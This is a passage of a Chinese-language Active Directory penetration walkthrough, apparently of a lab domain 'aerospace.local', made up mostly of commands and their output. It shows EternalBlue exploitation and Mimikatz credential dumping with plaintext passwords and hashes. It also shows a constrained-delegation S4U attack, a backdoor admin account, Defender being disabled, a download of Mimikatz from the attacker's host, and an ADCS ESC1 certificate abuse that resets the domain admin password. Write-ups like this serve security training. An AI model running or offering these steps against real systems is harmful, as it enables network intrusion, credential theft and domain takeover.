msf exploit(windows/smb/ms17_010_eternalblue) > set lport 4444
lport => 4444
msf exploit(windows/smb/ms17_010_eternalblue) > run
[*] 172.22.10.36:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.22.10.36:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/recog-3.1.26/lib/recog/fingerprint/regexp_factory.rb:34: warning: nested repeat operator '+' and '?' was replaced with '*' in regular expression
[*] 172.22.10.36:445 - Scanned 1 of 1 hosts (100% complete)
[+] 172.22.10.36:445 - The target is vulnerable.
[*] 172.22.10.36:445 - Connecting to target for exploitation.
[+] 172.22.10.36:445 - Connection established for exploitation.
[+] 172.22.10.36:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.22.10.36:445 - CORE raw buffer dump (42 bytes)
[*] 172.22.10.36:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 172.22.10.36:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 172.22.10.36:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 172.22.10.36:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.22.10.36:445 - Trying exploit with 12 Groom Allocations.
[*] 172.22.10.36:445 - Sending all but last fragment of exploit packet
[*] 172.22.10.36:445 - Starting non-paged pool grooming
[+] 172.22.10.36:445 - Sending SMBv2 buffers
[+] 172.22.10.36:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.22.10.36:445 - Sending final SMBv2 buffers.
[*] 172.22.10.36:445 - Sending last fragment of exploit packet!
[*] 172.22.10.36:445 - Receiving response from exploit packet
[+] 172.22.10.36:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.22.10.36:445 - Sending egg to corrupted connection.
[*] 172.22.10.36:445 - Triggering free of corrupted buffer.
[*] Started bind TCP handler against 172.22.10.36:4444
[-] 172.22.10.36:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 172.22.10.36:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 172.22.10.36:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 172.22.10.36:445 - Connecting to target for exploitation.
[+] 172.22.10.36:445 - Connection established for exploitation.
[+] 172.22.10.36:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.22.10.36:445 - CORE raw buffer dump (42 bytes)
[*] 172.22.10.36:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 172.22.10.36:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 172.22.10.36:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 172.22.10.36:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.22.10.36:445 - Trying exploit with 17 Groom Allocations.
[*] 172.22.10.36:445 - Sending all but last fragment of exploit packet
[*] 172.22.10.36:445 - Starting non-paged pool grooming
[+] 172.22.10.36:445 - Sending SMBv2 buffers
[+] 172.22.10.36:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.22.10.36:445 - Sending final SMBv2 buffers.
[*] 172.22.10.36:445 - Sending last fragment of exploit packet!
[*] 172.22.10.36:445 - Receiving response from exploit packet
[+] 172.22.10.36:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.22.10.36:445 - Sending egg to corrupted connection.
[*] 172.22.10.36:445 - Triggering free of corrupted buffer.
[*] Sending stage (232006 bytes) to 172.22.10.36
[*] Meterpreter session 1 opened (192.168.93.128:33987 -> 172.22.10.36:4444) at 2026-03-20 10:41:20 -0400
[+] 172.22.10.36:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.22.10.36:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.22.10.36:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > sysinfo
Computer : WIN-PC8086
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : AEROSPACE
Logged On Users : 3
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
|
2.2 Mimikatz 抓取凭据#
由于这台机器位于域内,使用 Mimikatz 收集域内信息:
1
2
| load kiwi
kiwi_cmd "sekurlsa::logonpasswords"
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
| meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > kiwi_cmd "sekurlsa::logonpasswords"
Authentication Id : 0 ; 5564485 (00000000:0054e845)
Session : Interactive from 1
User Name : John
Domain : WIN-PC8086
Logon Server : WIN-PC8086
Logon Time : 2024/2/22 11:38:28
SID : S-1-5-21-756936077-305233120-2093608108-1000
msv :
[00000003] Primary
* Username : John
* Domain : WIN-PC8086
* LM : 7fbdbe322b6101bb1aa818381e4e281b
* NTLM : 5ffb08c80d9f260355e01c17a233e8f1
* SHA1 : 8afa1eebf3490d255619262e43aa71ba1ab4b52e
tspkg :
* Username : John
* Domain : WIN-PC8086
* Password : John@123
wdigest :
* Username : John
* Domain : WIN-PC8086
* Password : John@123
kerberos :
* Username : John
* Domain : WIN-PC8086
* Password : John@123
ssp :
credman :
Authentication Id : 0 ; 5564450 (00000000:0054e822)
Session : Interactive from 1
User Name : John
Domain : WIN-PC8086
Logon Server : WIN-PC8086
Logon Time : 2024/2/22 11:38:28
SID : S-1-5-21-756936077-305233120-2093608108-1000
msv :
[00000003] Primary
* Username : John
* Domain : WIN-PC8086
* LM : 7fbdbe322b6101bb1aa818381e4e281b
* NTLM : 5ffb08c80d9f260355e01c17a233e8f1
* SHA1 : 8afa1eebf3490d255619262e43aa71ba1ab4b52e
tspkg :
* Username : John
* Domain : WIN-PC8086
* Password : John@123
wdigest :
* Username : John
* Domain : WIN-PC8086
* Password : John@123
kerberos :
* Username : John
* Domain : WIN-PC8086
* Password : John@123
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/2/22 0:15:26
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WIN-PC8086$
Domain : AEROSPACE
Logon Server : (null)
Logon Time : 2024/2/22 0:15:26
SID : S-1-5-20
msv :
[00000003] Primary
* Username : WIN-PC8086$
* Domain : AEROSPACE
* NTLM : 1878248073dc58f665227675e99b8333
* SHA1 : b4ce7bea0939e9ac4b3b0f9235f857ccf08cac23
tspkg :
wdigest :
* Username : WIN-PC8086$
* Domain : AEROSPACE
* Password : 4d 75 54 14 3a 7f c6 6c ac d2 c4 b1 04 09 69 82 0a 62 9d 02 7f e3 56 df 86 e2 ac c8 f2 4e ed 39 e7 f2 0c 9f 3c e8 0e a2 dc ae 46 13 28 29 7f 2c ce 3c 50 da 06 b1 eb d7 18 1f 35 b1 87 38 a8 3b a4 6e b2 c3 75 88 36 b6 ae dc 46 18 86 63 c9 cb 4d 63 ae 31 35 49 8c 7e 59 8f 05 ce 5b 5b 1d 5c dd 60 58 b5 ad f3 e0 c4 0d ca 5e e7 93 61 3f e8 48 a9 9e ba 02 7a 9f df 88 84 4e ad 87 81 2d 4e b6 00 36 92 4e 9d 27 03 3f c9 eb a0 05 3b 25 92 c8 55 40 e8 6b bd 9c 6b 0f 7e ef 73 49 67 96 e1 7a 68 35 e0 39 25 50 7b 2a 96 a0 13 7f d1 7f 9a 2b 63 5d 4d 58 ae 15 07 a1 70 02 73 a7 f3 45 80 5d 41 7a bb 8a 6d e1 29 47 a8 84 ca 92 8f a3 27 25 a2 4a 55 df 65 cc 72 5b 7e f2 f2 6d ff d5 07 a3 ec 64 d8 c3 a7 cf 41 b0 c9 25 2e 7a 12 83 07
kerberos :
* Username : win-pc8086$
* Domain : AEROSPACE.LOCAL
* Password : 4d 75 54 14 3a 7f c6 6c ac d2 c4 b1 04 09 69 82 0a 62 9d 02 7f e3 56 df 86 e2 ac c8 f2 4e ed 39 e7 f2 0c 9f 3c e8 0e a2 dc ae 46 13 28 29 7f 2c ce 3c 50 da 06 b1 eb d7 18 1f 35 b1 87 38 a8 3b a4 6e b2 c3 75 88 36 b6 ae dc 46 18 86 63 c9 cb 4d 63 ae 31 35 49 8c 7e 59 8f 05 ce 5b 5b 1d 5c dd 60 58 b5 ad f3 e0 c4 0d ca 5e e7 93 61 3f e8 48 a9 9e ba 02 7a 9f df 88 84 4e ad 87 81 2d 4e b6 00 36 92 4e 9d 27 03 3f c9 eb a0 05 3b 25 92 c8 55 40 e8 6b bd 9c 6b 0f 7e ef 73 49 67 96 e1 7a 68 35 e0 39 25 50 7b 2a 96 a0 13 7f d1 7f 9a 2b 63 5d 4d 58 ae 15 07 a1 70 02 73 a7 f3 45 80 5d 41 7a bb 8a 6d e1 29 47 a8 84 ca 92 8f a3 27 25 a2 4a 55 df 65 cc 72 5b 7e f2 f2 6d ff d5 07 a3 ec 64 d8 c3 a7 cf 41 b0 c9 25 2e 7a 12 83 07
ssp :
credman :
Authentication Id : 0 ; 47080 (00000000:0000b7e8)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2024/2/22 0:15:26
SID :
msv :
[00000003] Primary
* Username : WIN-PC8086$
* Domain : AEROSPACE
* NTLM : 1878248073dc58f665227675e99b8333
* SHA1 : b4ce7bea0939e9ac4b3b0f9235f857ccf08cac23
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WIN-PC8086$
Domain : AEROSPACE
Logon Server : (null)
Logon Time : 2024/2/22 0:15:26
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WIN-PC8086$
* Domain : AEROSPACE
* Password : 4d 75 54 14 3a 7f c6 6c ac d2 c4 b1 04 09 69 82 0a 62 9d 02 7f e3 56 df 86 e2 ac c8 f2 4e ed 39 e7 f2 0c 9f 3c e8 0e a2 dc ae 46 13 28 29 7f 2c ce 3c 50 da 06 b1 eb d7 18 1f 35 b1 87 38 a8 3b a4 6e b2 c3 75 88 36 b6 ae dc 46 18 86 63 c9 cb 4d 63 ae 31 35 49 8c 7e 59 8f 05 ce 5b 5b 1d 5c dd 60 58 b5 ad f3 e0 c4 0d ca 5e e7 93 61 3f e8 48 a9 9e ba 02 7a 9f df 88 84 4e ad 87 81 2d 4e b6 00 36 92 4e 9d 27 03 3f c9 eb a0 05 3b 25 92 c8 55 40 e8 6b bd 9c 6b 0f 7e ef 73 49 67 96 e1 7a 68 35 e0 39 25 50 7b 2a 96 a0 13 7f d1 7f 9a 2b 63 5d 4d 58 ae 15 07 a1 70 02 73 a7 f3 45 80 5d 41 7a bb 8a 6d e1 29 47 a8 84 ca 92 8f a3 27 25 a2 4a 55 df 65 cc 72 5b 7e f2 f2 6d ff d5 07 a3 ec 64 d8 c3 a7 cf 41 b0 c9 25 2e 7a 12 83 07
kerberos :
* Username : win-pc8086$
* Domain : AEROSPACE.LOCAL
* Password : 4d 75 54 14 3a 7f c6 6c ac d2 c4 b1 04 09 69 82 0a 62 9d 02 7f e3 56 df 86 e2 ac c8 f2 4e ed 39 e7 f2 0c 9f 3c e8 0e a2 dc ae 46 13 28 29 7f 2c ce 3c 50 da 06 b1 eb d7 18 1f 35 b1 87 38 a8 3b a4 6e b2 c3 75 88 36 b6 ae dc 46 18 86 63 c9 cb 4d 63 ae 31 35 49 8c 7e 59 8f 05 ce 5b 5b 1d 5c dd 60 58 b5 ad f3 e0 c4 0d ca 5e e7 93 61 3f e8 48 a9 9e ba 02 7a 9f df 88 84 4e ad 87 81 2d 4e b6 00 36 92 4e 9d 27 03 3f c9 eb a0 05 3b 25 92 c8 55 40 e8 6b bd 9c 6b 0f 7e ef 73 49 67 96 e1 7a 68 35 e0 39 25 50 7b 2a 96 a0 13 7f d1 7f 9a 2b 63 5d 4d 58 ae 15 07 a1 70 02 73 a7 f3 45 80 5d 41 7a bb 8a 6d e1 29 47 a8 84 ca 92 8f a3 27 25 a2 4a 55 df 65 cc 72 5b 7e f2 f2 6d ff d5 07 a3 ec 64 d8 c3 a7 cf 41 b0 c9 25 2e 7a 12 83 07
ssp :
credman :
meterpreter >
|
抓取到的关键凭据:
本地用户:
- 用户名:
John(本地账户) - 明文密码:
John@123 - NTLM Hash:
5ffb08c80d9f260355e01c17a233e8f1
机器账户:
- 用户名:
WIN-PC8086$ - 所属域:
AEROSPACE - NTLM Hash:
1878248073dc58f665227675e99b8333
2.3 发现约束委派#
什么是约束委派?
在 AD 域中,委派允许一个账户代表其他用户去访问某个服务。约束委派是域管理员配置的:WIN-PC8086$ 这个机器账户,被允许代表任意用户,去访问 WIN-PC8098 的 HOST 和 CIFS 服务。这个配置存储在 msDS-AllowedToDelegateTo 属性里。
使用 findDelegation.py 枚举域内委派配置:
先找到 findDelegation.py 的位置:
1
| find / -name "findDelegation.py" 2>/dev/null
|
python3 findDelegation.py aerospace.local/WIN-PC8086\$ -hashes :1878248073dc58f665227675e99b8333 -dc-ip 172.22.10.11
发现 WIN-PC8086$ 对 WIN-PC8098 的 HOST 和 CIFS 服务具有带协议转换的约束委派权限。
第三阶段:WIN-PC8098(172.22.10.40)— 约束委派攻击#
3.1 S4U 协议获取票据#
利用 S4U 协议(S4U2Self + S4U2Proxy),以 WIN-PC8086$ 身份模拟 Administrator 访问 WIN-PC8098 的 CIFS 服务:
- S4U2Self:WIN-PC8086$ 向 KDC 说"我要代表 Administrator" → KDC 返回一张 Administrator 身份的票据
- S4U2Proxy:WIN-PC8086$ 拿着这张票据说"Administrator 要访问 WIN-PC8098 的 CIFS 服务" → KDC 检查
msDS-AllowedToDelegateTo,确认允许 → 返回服务票据
1
| python3 getST.py aerospace.local/WIN-PC8086\$ -hashes :1878248073dc58f665227675e99b8333 -spn CIFS/WIN-PC8098.aerospace.local -impersonate Administrator -dc-ip 172.22.10.11
|
注意:最好用 root 执行,否则可能没有写权限保存 ccache 文件。
3.2 Kerberos 认证登录#
设置票据环境变量并添加 DNS 解析:
1
2
3
4
5
6
7
8
9
10
11
| ┌──(root㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─# export KRB5CCNAME='Administrator@CIFS_WIN-PC8098.aerospace.local@AEROSPACE.LOCAL.ccache'
# 解析 WIN-PC8098 的 IP 并加入 hosts
┌──(root㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─# nslookup WIN-PC8098.aerospace.local 172.22.10.11
Name: WIN-PC8098.aerospace.local
Address: 172.22.10.40
┌──(root㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─# echo '172.22.10.40 WIN-PC8098.aerospace.local WIN-PC8098' >> /etc/hosts
|
通过 wmiexec.py 获取 shell:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
| ┌──(root㉿kali)-[~]
└─# cd /usr/share/doc/python3-impacket/examples
┌──(root㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─# python3 getST.py aerospace.local/WIN-PC8086\$ -hashes :1878248073dc58f665227675e99b8333 -spn CIFS/WIN-PC8098.aerospace.local -impersonate Administrator -dc-ip 172.22.10.11
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@CIFS_WIN-PC8098.aerospace.local@AEROSPACE.LOCAL.ccache
┌──(root㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─# export KRB5CCNAME='Administrator@CIFS_WIN-PC8098.aerospace.local@AEROSPACE.LOCAL.ccache'
┌──(root㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─# python3 wmiexec.py -k aerospace.local/Administrator@WIN-PC8098.aerospace.local -no-pass -dc-ip 172.22.10.11
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] [Errno Connection error (WIN-PC8098.aerospace.local:445)] [Errno -2] Name or service not known
┌──(root㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─# nslookup WIN-PC8098.aerospace.local 172.22.10.11
Server: 172.22.10.11
Address: 172.22.10.11#53
Name: WIN-PC8098.aerospace.local
Address: 172.22.10.40
┌──(root㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─# echo '172.22.10.40 WIN-PC8098.aerospace.local WIN-PC8098' >> /etc/hosts
┌──(root㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─# python3 wmiexec.py -k aerospace.local/Administrator@WIN-PC8098.aerospace.local -no-pass -dc-ip 172.22.10.11
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
aerospace\administrator
C:\>
|
3.3 发现域用户进程#
tasklist /v 发现域用户 AEROSPACE\liuyuhua 的进程在运行:
1
2
| elevation_service.exe 7572 Services 0 AEROSPACE\liuyuhua 0:00:00
GoogleUpdate.exe 7960 Services 0 AEROSPACE\liuyuhua 0:00:00
|
3.4 绕过 Defender 抓取凭据#
由于该机器开启了 Windows Defender,需要先绕过:
新建管理员用户#
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| C:\>net user hacker P@ssw0rd123 /add
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
����ɹ���ɡ�
C:\>net localgroup Administrators hacker /add
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
����ɹ���ɡ�
C:\>
|
开启远程桌面#
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| C:\> reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
�����ɹ���ɡ�
C:\>netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
ȷ����
C:\>
|
RDP 连接#
xfreerdp /v:172.22.10.40 /u:hacker /p:P@ssw0rd123 /cert:ignore
关闭 Windows Defender#
RDP 进去后,打开 PowerShell(管理员):
Set-MpPreference -DisableRealtimeMonitoring $true
上传并运行 Mimikatz#
Mimikatz 地址:https://github.com/ParrotSec/mimikatz
Kali 上起 HTTP 服务:
python3 -m http.server 8080
RDP 的 PowerShell 里下载:
Invoke-WebRequest -Uri http://192.168.93.128:8080/mimikatz.exe -OutFile C:\Users\hacker\mimikatz.exe
抓取 liuyuhua 的哈希#
运行 Mimikatz(管理员权限):
1
2
3
4
| mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
|
成功抓取 liuyuhua 凭据:
- NTLM Hash:
2c8e4ec4d8a61869d85c7921c6076dfd - 明文密码:
Yu%a#E8T6iR
第四阶段:DC01(172.22.10.11)— ADCS 证书攻击#
4.1 漏洞分析#
域内存在 ADCS(Active Directory Certificate Services)服务,通过 Certify 枚举发现证书模板 AeroUser 存在错误配置(ESC1):
- 开启了
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT(允许申请者自定义证书主题) - 所有域用户都有注册权限
利用思路: 以 liuyuhua 身份申请一张包含域管 Administrator 身份的证书。
4.2 添加 hosts 解析#
1
2
3
4
5
| ┌──(root㉿kali)-[~]
└─# echo '172.22.10.13 CA.aerospace.local CA' >> /etc/hosts
┌──(root㉿kali)-[~]
└─# echo '172.22.10.11 DC01.aerospace.local DC01' >> /etc/hosts
|
4.3 申请域管证书#
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
| ┌──(root㉿kali)-[~]
└─# certipy-ad req -username liuyuhua@aerospace.local -hashes :2c8e4ec4d8a61869d85c7921c6076dfd -ca aerospace-CA-CA -target CA.aerospace.local -template AeroUser -upn Administrator@aerospace.local -dns DC01.aerospace.local -dc-ip 172.22.10.11 -ns 172.22.10.11 -debug
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[+] DC host (-dc-host) not specified. Using domain as DC host
[+] Nameserver: '172.22.10.11'
[+] DC IP: '172.22.10.11'
[+] DC Host: 'AEROSPACE.LOCAL'
[+] Target IP: None
[+] Remote Name: 'CA.aerospace.local'
[+] Domain: 'AEROSPACE.LOCAL'
[+] Username: 'LIUYUHUA'
[+] Trying to resolve 'CA.aerospace.local' at '172.22.10.11'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:172.22.10.13[\pipe\cert]
[+] Connected to endpoint: ncacn_np:172.22.10.13[\pipe\cert]
[*] Request ID is 7
[*] Successfully requested certificate
[*] Got certificate with multiple identities
UPN: 'Administrator@aerospace.local'
DNS Host Name: 'DC01.aerospace.local'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator_dc01.pfx'
[+] Attempting to write data to 'administrator_dc01.pfx'
[+] Data written to 'administrator_dc01.pfx'
[*] Wrote certificate and private key to 'administrator_dc01.pfx'
|
4.4 证书认证获取域管权限#
由于 DC 不支持 PKINIT(报错 KDC_ERR_PADATA_TYPE_NOSUPP),无法直接用证书换 TGT。改用 Schannel + LDAPS 方式,通过证书认证到 LDAP 并修改域管密码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
| ┌──(root㉿kali)-[~]
└─# certipy-ad auth -pfx administrator_dc01.pfx -dc-ip 172.22.10.11 -ldap-shell
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'Administrator@aerospace.local'
[*] SAN DNS Host Name: 'DC01.aerospace.local'
[*] Connecting to 'ldaps://172.22.10.11:636'
[*] Authenticated to '172.22.10.11' as: 'u:AEROSPACE\\Administrator'
Type help for list of commands
# help
add_computer computer [password] [nospns] - Adds a new computer to the domain with the specified password. If nospns is specified, computer will be created with only a single necessary HOST SPN. Requires LDAPS.
rename_computer current_name new_name - Sets the SAMAccountName attribute on a computer object to a new value.
add_user new_user [parent] - Creates a new user.
add_user_to_group user group - Adds a user to a group.
change_password user [password] - Attempt to change a given user's password. Requires LDAPS.
clear_rbcd target - Clear the resource based constrained delegation configuration information.
clear_shadow_creds target - Clear shadow credentials on the target (sAMAccountName).
disable_account user - Disable the user's account.
enable_account user - Enable the user's account.
dump - Dumps the domain.
search query [attributes,] - Search users and groups by name, distinguishedName and sAMAccountName.
get_user_groups user - Retrieves all groups this user is a member of.
get_group_users group - Retrieves all members of a group.
get_laps_password computer - Retrieves the LAPS passwords associated with a given computer (sAMAccountName).
grant_control [search_base] target grantee - Grant full control on a given target object (sAMAccountName or search filter, optional search base) to the grantee (sAMAccountName).
set_dontreqpreauth user true/false - Set the don't require pre-authentication flag to true or false.
set_rbcd target grantee - Grant the grantee (sAMAccountName) the ability to perform RBCD to the target (sAMAccountName).
set_shadow_creds target - Set shadow credentials on the target object (sAMAccountName).
start_tls - Send a StartTLS command to upgrade from LDAP to LDAPS. Use this to bypass channel binding for operations necessitating an encrypted channel.
write_gpo_dacl user gpoSID - Write a full control ACE to the gpo for the given user. The gpoSID must be entered surrounding by {}.
whoami - get connected user
dirsync - Dirsync requested attributes
exit - Terminates this session.
# whoami
u:AEROSPACE\Administrator
# change_password Administrator P@ssw0rd2024!
Got User DN: CN=Administrator,CN=Users,DC=aerospace,DC=local
Attempting to set new password of: P@ssw0rd2024!
Password changed successfully!
#
|
4.5 横向移动 — 拿下 DC01#
使用修改后的域管密码,通过 WMI 远程执行获取域控 shell:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
| ┌──(root㉿kali)-[~]
└─# python3 /usr/share/doc/python3-impacket/examples/wmiexec.py aerospace.local/Administrator:'P@ssw0rd2024!'@DC01.aerospace.local -dc-ip 172.22.10.11
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
aerospace\administrator
C:\>ipconfig /all
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
Windows IP ����
������ . . . . . . . . . . . . . : DC01
�� DNS �� . . . . . . . . . . . : aerospace.local
�ڵ����� . . . . . . . . . . . . : ���
IP ·�������� . . . . . . . . . . : ��
WINS ���������� . . . . . . . . . : ��
DNS �������б� . . . . . . . . : aerospace.local
��̫�������� Ethernet0:
�����ض��� DNS �� . . . . . . . :
����. . . . . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection
������ַ. . . . . . . . . . . . . : 00-0C-29-0A-B5-7D
DHCP ������ . . . . . . . . . . . : ��
�Զ�����������. . . . . . . . . . : ��
�������� IPv6 ��ַ. . . . . . . . : fe80::999b:7dc:74ef:5f1b%5(��ѡ)
IPv4 ��ַ . . . . . . . . . . . . : 172.22.10.11(��ѡ)
�������� . . . . . . . . . . . . : 255.255.255.0
Ĭ������. . . . . . . . . . . . . : 172.22.10.1
DHCPv6 IAID . . . . . . . . . . . : 50334761
DHCPv6 �ͻ��� DUID . . . . . . . : 00-01-00-01-31-4F-BF-E8-00-0C-29-0A-B5-7D
DNS ������ . . . . . . . . . . . : ::1
127.0.0.1
TCPIP �ϵ� NetBIOS . . . . . . . : ������
���������� isatap.{738F0B3D-58F3-4C8E-91B7-D4461A6E8BCC}:
ý��״̬ . . . . . . . . . . . . : ý���ѶϿ�����
�����ض��� DNS �� . . . . . . . :
����. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #2
������ַ. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP ������ . . . . . . . . . . . : ��
�Զ�����������. . . . . . . . . . : ��
C:\>
|
DC01 拿下!
第五阶段:CA(172.22.10.13)— 横向移动#
同样使用域管密码通过 WMI 获取 CA 服务器 shell:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
| ┌──(root㉿kali)-[~]
└─# python3 /usr/share/doc/python3-impacket/examples/wmiexec.py aerospace.local/Administrator:'P@ssw0rd2024!'@CA.aerospace.local -dc-ip 172.22.10.13
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
aerospace\administrator
C:\>ipconfig /all
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
Windows IP ����
������ . . . . . . . . . . . . . : CA
�� DNS �� . . . . . . . . . . . : aerospace.local
�ڵ����� . . . . . . . . . . . . : ���
IP ·�������� . . . . . . . . . . : ��
WINS ���������� . . . . . . . . . : ��
DNS �������б� . . . . . . . . : aerospace.local
��̫�������� Ethernet0:
�����ض��� DNS �� . . . . . . . :
����. . . . . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection
